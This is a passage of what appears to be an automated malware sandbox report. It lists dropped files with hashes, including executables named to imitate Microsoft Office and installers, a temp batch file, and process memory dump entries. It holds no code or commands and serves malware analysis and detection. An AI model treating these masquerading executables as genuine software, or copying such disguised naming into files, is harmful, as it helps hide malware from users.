023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096

SHA512
ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82

Download Submit
C:\Program Files\Microsoft office.exe

Filesize
3.8MB

MD5
2bc19dd96b42cea3280eb5fe1e949b82

SHA1
d4daeaa890659239a848d36b34e1c5b0d150c42f

SHA256
6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205

SHA512
e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b

Download Submit
C:\Program Files\Microsoft office.exe

Filesize
3.8MB

MD5
2bc19dd96b42cea3280eb5fe1e949b82

SHA1
d4daeaa890659239a848d36b34e1c5b0d150c42f

SHA256
6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205

SHA512
e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b

Download Submit
C:\Program Files\Microsoft.exe

Filesize
132KB

MD5
5cf52aea15ebdef8a216f5a3d4f44c73

SHA1
b7394c7347b84db2d878e9deb260862d51023dd4

SHA256
479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078

SHA512
230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b

Download Submit
C:\Program Files\Microsoft.exe

Filesize
132KB

MD5
5cf52aea15ebdef8a216f5a3d4f44c73

SHA1
b7394c7347b84db2d878e9deb260862d51023dd4

SHA256
479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078

SHA512
230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b

Download Submit
C:\Program Files\installerX32.exe

Filesize
91KB

MD5
c27bdf2ff2a21ec02ed912e7fac3477c

SHA1
5ad38698e859a7853f7bab46c02efd03144fef36

SHA256
3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c

SHA512
1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADA.tmp\ADB.tmp\ADC.bat

Filesize
4KB

MD5
3c92f725b696f48b1ae5386c6b88147d

SHA1
7d80fab21ff225acdefbe3c33e11d57dbd58244b

SHA256
50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2

SHA512
ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03

Download Submit
\Program Files\Builded.exe

Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\Builded.exe

Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\Builded.exe

Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\Builded.exe

Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\InstallerX64.exe

Filesize
91KB

MD5
cc3db2432720f58955baa76ab4708a18

SHA1
256923ae3d9888262be5c548b553182c4400674a

SHA256
023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096

SHA512
ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82

Download Submit
\Program Files\InstallerX64.exe

Filesize
91KB

MD5
cc3db2432720f58955baa76ab4708a18

SHA1
256923ae3d9888262be5c548b553182c4400674a

SHA256
023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096

SHA512
ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82

Download Submit
\Program Files\InstallerX64.exe

Filesize
91KB

MD5
cc3db2432720f58955baa76ab4708a18

SHA1
256923ae3d9888262be5c548b553182c4400674a

SHA256
023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096

SHA512
ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82

Download Submit
\Program Files\Microsoft office.exe

Filesize
3.8MB

MD5
2bc19dd96b42cea3280eb5fe1e949b82

SHA1
d4daeaa890659239a848d36b34e1c5b0d150c42f

SHA256
6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205

SHA512
e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b

Download Submit
\Program Files\Microsoft office.exe

Filesize
3.8MB

MD5
2bc19dd96b42cea3280eb5fe1e949b82

SHA1
d4daeaa890659239a848d36b34e1c5b0d150c42f

SHA256
6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205

SHA512
e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b

Download Submit
\Program Files\Microsoft office.exe

Filesize
3.8MB

MD5
2bc19dd96b42cea3280eb5fe1e949b82

SHA1
d4daeaa890659239a848d36b34e1c5b0d150c42f

SHA256
6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205

SHA512
e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b

Download Submit
\Program Files\Microsoft office.exe

Filesize
3.8MB

MD5
2bc19dd96b42cea3280eb5fe1e949b82

SHA1
d4daeaa890659239a848d36b34e1c5b0d150c42f

SHA256
6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205

SHA512
e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b

Download Submit
\Program Files\Microsoft.exe

Filesize
132KB

MD5
5cf52aea15ebdef8a216f5a3d4f44c73

SHA1
b7394c7347b84db2d878e9deb260862d51023dd4

SHA256
479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078

SHA512
230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b

Download Submit
\Program Files\Microsoft.exe

Filesize
132KB

MD5
5cf52aea15ebdef8a216f5a3d4f44c73

SHA1
b7394c7347b84db2d878e9deb260862d51023dd4

SHA256
479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078

SHA512
230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b

Download Submit
\Program Files\Microsoft.exe

Filesize
132KB

MD5
5cf52aea15ebdef8a216f5a3d4f44c73

SHA1
b7394c7347b84db2d878e9deb260862d51023dd4

SHA256
479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078

SHA512
230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b

Download Submit
\Program Files\Microsoft.exe

Filesize
132KB

MD5
5cf52aea15ebdef8a216f5a3d4f44c73

SHA1
b7394c7347b84db2d878e9deb260862d51023dd4

SHA256
479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078

SHA512
230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b

Download Submit
\Program Files\installerX32.exe

Filesize
91KB

MD5
c27bdf2ff2a21ec02ed912e7fac3477c

SHA1
5ad38698e859a7853f7bab46c02efd03144fef36

SHA256
3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c

SHA512
1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1

Download Submit
\Program Files\installerX32.exe

Filesize
91KB

MD5
c27bdf2ff2a21ec02ed912e7fac3477c

SHA1
5ad38698e859a7853f7bab46c02efd03144fef36

SHA256
3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c

SHA512
1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1

Download Submit
\Program Files\installerX32.exe

Filesize
91KB

MD5
c27bdf2ff2a21ec02ed912e7fac3477c

SHA1
5ad38698e859a7853f7bab46c02efd03144fef36

SHA256
3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c

SHA512
1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1

Download Submit
memory/108-122-0x0000000000000000-mapping.dmp

Download
memory/340-120-0x0000000000000000-mapping.dmp

Download
memory/536-147-0x0000000000000000-mapping.dmp

Download
memory/564-115-0x0000000000000000-mapping.dmp

Download
memory/568-114-0x0000000000000000-mapping.dmp

Download
memory/568-133-0x0000000000000000-mapping.dmp

Download
memory/576-59-0x0000000000000000-mapping.dmp

Download
memory/584-66-0x0000000000000000-mapping.dmp

Download
memory/584-93-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/584-153-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/608-71-0x0000000000000000-mapping.dmp

Download
memory/704-139-0x0000000000000000-mapping.dmp

Download
memory/772-116-0x0000000000000000-mapping.dmp

Download
memory/772-134-0x0000000000000000-mapping.dmp

Download
memory/776-96-0x0000000000000000-mapping.dmp

Download
memory/828-94-0x0000000000000000-mapping.dmp

Download
memory/828-149-0x0000000000000000-mapping.dmp

Download
memory/848-105-0x0000000000000000-mapping.dmp

Download
memory/872-78-0x0000000000000000-mapping.dmp

Download
memory/928-98-0x0000000000000000-mapping.dmp

Download
memory/948-131-0x0000000000000000-mapping.dmp

Download
memory/948-110-0x0000000000000000-mapping.dmp

Download
memory/972-100-0x0000000000000000-mapping.dmp

Download
memory/996-101-0x0000000000000000-mapping.dmp

Download
memory/1004-124-0x0000000000000000-mapping.dmp

Download
memory/1032-144-0x0000000000000000-mapping.dmp

Download
memory/1084-104-0x0000000000000000-mapping.dmp

Download
memory/1108-126-0x0000000000000000-mapping.dmp

Download
memory/1148-148-0x0000000000000000-mapping.dmp

Download
memory/1172-97-0x0000000000000000-mapping.dmp

Download
memory/1172-127-0x0000000000000000-mapping.dmp

Download
memory/1204-107-0x0000000000000000-mapping.dmp

Download
memory/1240-145-0x0000000000000000-mapping.dmp

Download
memory/1280-146-0x0000000000000000-mapping.dmp

Download
memory/1280-152-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/1336-128-0x0000000000000000-mapping.dmp

Download
memory/1352-90-0x0000000000000000-mapping.dmp

Download
memory/1412-117-0x0000000000000000-mapping.dmp

Download
memory/1508-123-0x0000000000000000-mapping.dmp

Download
memory/1508-92-0x0000000000000000-mapping.dmp

Download
memory/1528-137-0x0000000000000000-mapping.dmp

Download
memory/1540-119-0x0000000000000000-mapping.dmp

Download
memory/1540-138-0x0000000000000000-mapping.dmp

Download
memory/1572-142-0x0000000000000000-mapping.dmp

Download
memory/1636-111-0x0000000000000000-mapping.dmp

Download
memory/1640-77-0x0000000000000000-mapping.dmp

Download
memory/1656-86-0x0000000000000000-mapping.dmp

Download
memory/1676-132-0x0000000000000000-mapping.dmp

Download
memory/1676-112-0x0000000000000000-mapping.dmp

Download
memory/1688-99-0x0000000000000000-mapping.dmp

Download
memory/1708-121-0x0000000000000000-mapping.dmp

Download
memory/1728-108-0x0000000000000000-mapping.dmp

Download
memory/1740-109-0x0000000000000000-mapping.dmp

Download
memory/1744-129-0x0000000000000000-mapping.dmp

Download
memory/1752-106-0x0000000000000000-mapping.dmp

Download
memory/1776-103-0x0000000000000000-mapping.dmp

Download
memory/1784-136-0x0000000000000000-mapping.dmp

Download
memory/1820-135-0x0000000000000000-mapping.dmp

Download
memory/1836-141-0x0000000000000000-mapping.dmp

Download
memory/1900-118-0x0000000000000000-mapping.dmp

Download
memory/1932-143-0x0000000000000000-mapping.dmp

Download
memory/1948-125-0x0000000000000000-mapping.dmp

Download
memory/1948-95-0x0000000000000000-mapping.dmp

Download
memory/1956-113-0x0000000000000000-mapping.dmp

Download
memory/1988-102-0x0000000000000000-mapping.dmp

Download
memory/1992-140-0x0000000000000000-mapping.dmp

Download
memory/1996-54-0x00000000752B1000-0x00000000752B3000-memory.dmp

Filesize
8KB

Download
memory/2016-89-0x0000000000400000-0x00000000007CE000-memory.dmp

Filesize
3.8MB

Download
memory/2016-87-0x0000000000000000-mapping.dmp

Download